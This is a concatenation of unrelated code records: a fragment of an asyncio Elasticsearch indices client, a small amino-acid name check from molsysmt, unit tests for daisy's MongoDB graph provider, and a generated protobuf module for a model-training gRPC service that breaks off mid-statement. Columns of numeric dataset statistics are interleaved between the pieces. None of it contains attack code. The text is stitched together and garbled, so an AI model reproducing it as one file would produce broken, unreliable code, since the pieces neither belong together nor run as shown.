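    #     yield from es.indices.optimize(
    #         index='my-index', max_num_segments=1)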
@asyncio.coroutine
def validate_query(self, index=None, doc_type=None, body=None, *,
explain=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, operation_threading=default,
q=default, source=default):
"""Validate a potentially expensive query without executing it."""
params = {}
if explain is not default:
params['explain'] = bool(explain)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if q is not default:
params['q'] = str(q)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if source is not default:
params['source'] = str(source)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, doc_type, '_validate', 'query'),
params=params, body=body)
return data
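    # Usage sketch (illustrative): a Lucene query string can be checked
    # without executing it, e.g.
    #
    #     result = yield from es.indices.validate_query(
    #         index='my-index', q='user:kimchy', explain=True)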
@asyncio.coroutine
def clear_cache(self, index=None, *,
field_data=default, fielddata=default, fields=default,
filter=default, filter_cache=default, filter_keys=default,
id=default, id_cache=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, recycler=default):
"""Clear cache.
Clear either all caches or specific cached associated with one or
more indices.
"""
params = {}
if recycler is not default:
params['recycler'] = bool(recycler)
if id_cache is not default:
params['id_cache'] = bool(id_cache)
if id is not default:
params['id'] = bool(id)
if filter_keys is not default:
params['filter_keys'] = filter_keys
if filter_cache is not default:
params['filter_cache'] = bool(filter_cache)
if filter is not default:
params['filter'] = bool(filter)
if fields is not default:
params['fields'] = fields
if field_data is not default:
params['field_data'] = bool(field_data)
if fielddata is not default:
params['fielddata'] = bool(fielddata)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST', _make_path(index, '_cache', 'clear'),
params=params)
return data
@asyncio.coroutine
def recovery(self, index=None, *,
active_only=default, detailed=default, human=default):
"""Recover an index.
The indices recovery API provides insight into on-going shard
recoveries. Recovery status may be reported for specific indices, or
cluster-wide.
"""
params = {}
if active_only is not default:
params['active_only'] = bool(active_only)
if detailed is not default:
params['detailed'] = bool(detailed)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_recovery'), params=params)
return data
| 44.023316
| 113
| 0.607995
| 5,617
| 50,979
| 5.356952
| 0.053765
| 0.030907
| 0.067797
| 0.092124
| 0.826886
| 0.800432
| 0.786607
| 0.765969
| 0.753606
| 0.721635
| 0
| 0
| 0.309108
| 50,979
| 1,157
| 114
| 44.061366
| 0.85432
| 0.218168
| 0
| 0.717258
| 0
| 0
| 0.121531
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044064
| false
| 0
| 0.004896
| 0
| 0.099143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3fa906e89622df8e791b9b4e0cd124633752065
| 115
|
py
|
Python
|
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/aminoacid/is_aminoacid.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
from .get_aminoacid_type_from_name import name_to_type
def is_aminoacid(name):
    """Return True if `name` is a known amino-acid residue name."""
    return name in name_to_type
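# Illustrative check (hypothetical names; assumes name_to_type maps residue
# names such as 'ALA' to amino-acid types):
#
#     is_aminoacid('ALA')   # True
#     is_aminoacid('HOH')   # False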
| 19.166667
| 54
| 0.808696
| 20
| 115
| 4.2
| 0.55
| 0.142857
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13913
| 115
| 5
| 55
| 23
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
585e6e8ac0813fba7b68734c5473ee1f2aab876e
| 9,049
|
py
|
Python
|
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
parked_tests/test_graph_attribute_functions.py
|
rhoadesScholar/daisy
|
78cdd2ed0d67647a6602fb53cc952214450f3753
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import daisy
import logging
import unittest
import networkx as nx
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG)
daisy.scheduler._NO_SPAWN_STATUS_THREAD = True
class TestFilterMongoGraph(unittest.TestCase):
def get_mongo_graph_provider(
self, mode):
return daisy.persistence.MongoDbGraphProvider(
'test_daisy_graph',
directed=True,
mode=mode)
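    # Note: in these tests the mode flag mirrors file-open semantics ('w' to
    # write fixtures, 'r' to read them back, 'r+' to read and update); the
    # authoritative behaviour is defined by
    # daisy.persistence.MongoDbGraphProvider, so treat this as a reading aid.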
def test_graph_filtering(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2, position=(2, 2, 2), selected=True)
graph.add_node(42, position=(1, 1, 1), selected=False)
graph.add_node(23, position=(5, 5, 5), selected=True)
graph.add_node(57, position=daisy.Coordinate((7, 7, 7)), selected=True)
graph.add_edge(42, 23, selected=False)
graph.add_edge(57, 23, selected=True)
graph.add_edge(2, 42, selected=True)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r')
filtered_nodes = graph_provider.read_nodes(
roi, attr_filter={'selected': True})
filtered_node_ids = [node['id'] for node in filtered_nodes]
expected_node_ids = [2, 23, 57]
self.assertCountEqual(expected_node_ids, filtered_node_ids)
filtered_edges = graph_provider.read_edges(
roi, attr_filter={'selected': True})
filtered_edge_endpoints = [(edge['u'], edge['v'])
for edge in filtered_edges]
expected_edge_endpoints = [(57, 23), (2, 42)]
self.assertCountEqual(expected_edge_endpoints, filtered_edge_endpoints)
filtered_subgraph = graph_provider.get_graph(
roi,
nodes_filter={'selected': True},
edges_filter={'selected': True})
nodes_with_position = [node for node, data
in filtered_subgraph.nodes(data=True)
if 'position' in data]
self.assertCountEqual(expected_node_ids, nodes_with_position)
self.assertCountEqual(expected_edge_endpoints,
filtered_subgraph.edges())
def test_graph_filtering_complex(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r')
filtered_nodes = graph_provider.read_nodes(
roi, attr_filter={'selected': True,
'test': 'test'})
filtered_node_ids = [node['id'] for node in filtered_nodes]
expected_node_ids = [2, 57]
self.assertCountEqual(expected_node_ids, filtered_node_ids)
filtered_edges = graph_provider.read_edges(
roi, attr_filter={'selected': True,
'a': 100})
filtered_edge_endpoints = [(edge['u'], edge['v'])
for edge in filtered_edges]
expected_edge_endpoints = [(57, 23)]
self.assertCountEqual(expected_edge_endpoints, filtered_edge_endpoints)
filtered_subgraph = graph_provider.get_graph(
roi,
nodes_filter={'selected': True,
'test': 'test'},
edges_filter={'selected': True,
'a': 100})
nodes_with_position = [node for node, data
in filtered_subgraph.nodes(data=True)
if 'position' in data]
self.assertCountEqual(expected_node_ids, nodes_with_position)
self.assertCountEqual(expected_edge_endpoints,
filtered_subgraph.edges())
def test_graph_read_and_update_specific_attrs(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r+')
limited_graph = graph_provider.get_graph(
roi, node_attrs=['selected'], edge_attrs=['c'])
for node, data in limited_graph.nodes(data=True):
self.assertFalse('test' in data)
self.assertTrue('selected' in data)
data['selected'] = True
for u, v, data in limited_graph.edges(data=True):
self.assertFalse('a' in data)
self.assertFalse('b' in data)
nx.set_edge_attributes(limited_graph, 5, 'c')
limited_graph.update_edge_attrs(attributes=['c'])
limited_graph.update_node_attrs(attributes=['selected'])
updated_graph = graph_provider.get_graph(roi)
for node, data in updated_graph.nodes(data=True):
self.assertTrue(data['selected'])
for u, v, data in updated_graph.edges(data=True):
self.assertEqual(data['c'], 5)
def test_graph_read_unbounded_roi(self):
graph_provider = self.get_mongo_graph_provider('w')
roi = daisy.Roi((0, 0, 0),
(10, 10, 10))
unbounded_roi = daisy.Roi((None, None, None), (None, None, None))
graph = graph_provider[roi]
graph.add_node(2,
position=(2, 2, 2),
selected=True,
test='test')
graph.add_node(42,
position=(1, 1, 1),
selected=False,
test='test2')
graph.add_node(23,
position=(5, 5, 5),
selected=True,
test='test2')
graph.add_node(57,
position=daisy.Coordinate((7, 7, 7)),
selected=True,
test='test')
graph.add_edge(42, 23,
selected=False,
a=100,
b=3)
graph.add_edge(57, 23,
selected=True,
a=100,
b=2)
graph.add_edge(2, 42,
selected=True,
a=101,
b=3)
graph.write_nodes()
graph.write_edges()
graph_provider = self.get_mongo_graph_provider('r+')
limited_graph = graph_provider.get_graph(
unbounded_roi, node_attrs=['selected'], edge_attrs=['c'])
seen = []
for node, data in limited_graph.nodes(data=True):
self.assertFalse('test' in data)
self.assertTrue('selected' in data)
data['selected'] = True
seen.append(node)
self.assertCountEqual(seen, [2, 42, 23, 57])
| 36.051793
| 79
| 0.502155
| 948
| 9,049
| 4.565401
| 0.105485
| 0.090111
| 0.044362
| 0.043669
| 0.821858
| 0.786275
| 0.779575
| 0.746303
| 0.746303
| 0.746303
| 0
| 0.042429
| 0.395734
| 9,049
| 250
| 80
| 36.196
| 0.749086
| 0.00442
| 0
| 0.752381
| 0
| 0
| 0.029422
| 0
| 0
| 0
| 0
| 0
| 0.080952
| 1
| 0.02381
| false
| 0
| 0.02381
| 0.004762
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
586e8d8d8b9e2b527886a629551621c55e26b844
| 94,580
|
py
|
Python
|
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
lang/python/github/com/metaprov/modelaapi/services/trainerd/v1/trainerd_pb2.py
|
metaprov/modeldapi
|
ee05693832051dcd990ee4f061715d7ae0787340
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2
from github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2
from k8s.io.api.core.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto',
package='github.com.metaprov.modelaapi.services.trainerd.v1',
syntax='proto3',
serialized_options=b'Z2github.com/metaprov/modelaapi/services/trainerd/v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nAgithub.com/metaprov/modelaapi/services/trainerd/v1/trainerd.proto\x12\x32github.com.metaprov.modelaapi.services.trainerd.v1\x1aHgithub.com/metaprov/modelaapi/pkg/apis/training/v1alpha1/generated.proto\x1a\x44github.com/metaprov/modelaapi/pkg/apis/data/v1alpha1/generated.proto\x1a\x45github.com/metaprov/modelaapi/pkg/apis/infra/v1alpha1/generated.proto\x1aGgithub.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto\x1a\"k8s.io/api/core/v1/generated.proto\"\xbd\x06\n\x0cTrainRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\\\n\x06secret\x18\n \x03(\x0b\x32L.github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xa8\x04\n\rTrainResponse\x12T\n\x06result\x18\x01 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12\x17\n\x0fweightsCloudUri\x18\x02 \x01(\t\x12\x18\n\x10manifestCloudUri\x18\x03 \x01(\t\x12\x14\n\x0clogsCloudUri\x18\x04 \x01(\t\x12\x14\n\x0clabelEncoder\x18\x05 \x01(\t\x12\x19\n\x11pythonVersionInfo\x18\x06 \x01(\t\x12\x63\n\tpipFreeze\x18\x07 \x03(\x0b\x32P.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry\x12u\n\x12\x66\x65\x61turesImportance\x18\x08 \x03(\x0b\x32Y.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry\x1a\x30\n\x0ePipFreezeEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a\x39\n\x17\x46\x65\x61turesImportanceEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x02:\x02\x38\x01\"\xc1\x06\n\x0e\x43ompileRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12^\n\x06secret\x18\n \x03(\x0b\x32N.github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 
\x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"+\n\x0f\x43ompileResponse\x12\x18\n\x10\x63ompiledModelUri\x18\x01 \x01(\t\"\xbb\x06\n\x0bTestRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12[\n\x06secret\x18\n \x03(\x0b\x32K.github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xdc\x06\n\x0cTestResponse\x12Z\n\x0ctrain_result\x18\x01 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12Y\n\x0btest_result\x18\x02 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12^\n\x10\x62\x65nchmark_result\x18\x03 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement\x12\x1c\n\x14modelWeightsCloudUri\x18\x04 \x01(\t\x12\x1d\n\x15modelManifestCloudUri\x18\x05 \x01(\t\x12\x19\n\x11modelLogsCloudUri\x18\x06 \x01(\t\x12\x1a\n\x12preWeightsCloudUri\x18\x07 \x01(\t\x12\x1b\n\x13preManifestCloudUri\x18\x08 \x01(\t\x12\x17\n\x0fpreLogsCloudUri\x18\t \x01(\t\x12\x14\n\x0clabelEncoder\x18\n \x01(\t\x12\x13\n\x0bmisclassUri\x18\x0b \x01(\t\x12\x19\n\x11pythonVersionInfo\x18\x0c \x01(\t\x12\x62\n\tpipFreeze\x18\r \x03(\x0b\x32O.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry\x12t\n\x12\x66\x65\x61turesImportance\x18\x0e \x03(\x0b\x32X.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry\x1a\x30\n\x0ePipFreezeEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a\x39\n\x17\x46\x65\x61turesImportanceEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x02:\x02\x38\x01\"\x9c\x07\n\x14TrainEnsembleRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12M\n\x04\x62\x61se\x18\x05 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05model\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x07 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x08 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\t \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\n 
\x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\x64\n\x06secret\x18\x0b \x03(\x0b\x32T.github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\x9a\x07\n\x13TestEnsembleRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12M\n\x04\x62\x61se\x18\x05 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05model\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x07 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x08 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\t \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\n \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12\x63\n\x06secret\x18\x0b \x03(\x0b\x32S.github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\"\xc3\x06\n\x0f\x46orecastRequest\x12R\n\x07product\x18\x01 \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProduct\x12Y\n\x07version\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataProductVersion\x12T\n\x06\x62ucket\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.VirtualBucket\x12N\n\x05model\x18\x05 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Model\x12N\n\x05study\x18\x06 \x01(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.Study\x12T\n\ndatasource\x18\x07 \x01(\x0b\x32@.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.DataSource\x12N\n\x07\x64\x61taset\x18\x08 \x01(\x0b\x32=.github.com.metaprov.modelaapi.pkg.apis.data.v1alpha1.Dataset\x12U\n\nconnection\x18\t \x01(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.infra.v1alpha1.Connection\x12_\n\x06secret\x18\n \x03(\x0b\x32O.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry\x1a-\n\x0bSecretEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x0c:\x02\x38\x01\",\n\x10\x46orecastResponse\x12\x18\n\x10\x66orecastCloudUri\x18\x02 
\x01(\t\"\x11\n\x0fShutdownRequest\"\x12\n\x10ShutdownResponse2\xa3\x07\n\x0fTrainerdService\x12\x8e\x01\n\x05Train\x12@.github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest\x1a\x41.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse\"\x00\x12\x97\x01\n\x08\x46orecast\x12\x43.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest\x1a\x44.github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse\"\x00\x12\x8b\x01\n\x04Test\x12?.github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest\x1a@.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse\"\x00\x12\x9e\x01\n\rTrainEnsemble\x12H.github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest\x1a\x41.github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse\"\x00\x12\x9b\x01\n\x0cTestEnsemble\x12G.github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest\x1a@.github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse\"\x00\x12\x97\x01\n\x08Shutdown\x12\x43.github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest\x1a\x44.github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse\"\x00\x42\x34Z2github.com/metaprov/modelaapi/services/trainerd/v1b\x06proto3'
,
